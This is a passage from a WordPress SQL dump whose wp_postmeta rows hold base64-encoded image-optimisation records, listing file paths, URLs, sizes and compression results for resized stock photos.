jh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTA0LCJ0aW1lIjoxNDgzNTgzNTM1LCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozNTY4LCJ0aW1lIjoxNDgzNTgzNTM5LCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQwLCJ0aW1lIjoxNDgzNTgzNTQyLCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY3LCJ0aW1lIjoxNDgzNTgzNTQ2LCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDY5LCJ0aW1lIjoxNDgzNTgzNTQ5LCJpZCI6NzI2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6NzI5LCJ0aW1lIjoxNDgzNTgzNTUzLCJpZCI6NzI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1NDgsInRpbWUiOjE0ODM1ODM1NTYsImlkIjo3MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjY1OCwidGltZSI6MTQ4MzU4MzU2MCwiaWQiOjcyNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzI0LCJ0aW1lIjoxNDgzNTgzNTYzLCJpZCI6NzI2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3OTYsInRpbWUiOjE0ODM1ODM1NjcsImlkIjo3MjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTA1OTM4MTgzLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzEwNTkzODE4My00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xMDU5MzgxODMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg4NSwidGltZSI6MTQ4MzU4MzU3MSwiaWQiOjcyNn1d'); 
INSERT INTO `wp_postmeta` VALUES (30055, 725, 'wpfc_optimisation_reduction', '2874342'); 
INSERT INTO `wp_postmeta` VALUES (30056, 725, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLmpwZyIsIndpZHRoIjozMDA2LCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEuanBnIiwicmVkdWN0aW9uIjoyODc0MzI5LCJ0aW1lIjoxNDgzNTgzNTgzLCJpZCI6IjcyNSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNTg2LCJpZCI6NzI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MzU4OSwiaWQiOjcyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtNzY4eDUxMS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtNzY4eDUxMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM1OTQsImlkIjo3MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTE2MDB4MTA2NS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM1OTksImlkIjo3MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjAxLCJpZCI6NzI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182ODkwNjczMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MzYwMywiaWQiOjcyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjg5MDY3MzEtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODM2MDYsImlkIjo3MjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjA5LCJpZCI6NzI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjExLCJpZCI6NzI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjEzLCJpZCI6NzI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjE2LCJpZCI6NzI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjE4LCJpZCI6NzI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzY4OTA2NzMxLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgzNjIxLCJpZCI6NzI1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30057, 724, 'wpfc_optimisation_reduction', '13679'); 
INSERT INTO `wp_postmeta` VALUES (30058, 724, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2MTA2MzE5MC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjEwNjMxOTAuanBnIiwid2lkdGgiOjM0MTYsImhlaWdodCI6MjIzNywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MzYyNiwiaWQiOiI3MjQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zNjEwNjMxOTAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzYxMDYzMTkwLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM2MTA2MzE5MC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzA5LCJ0aW1lIjoxNDgzNTgzNjI5LC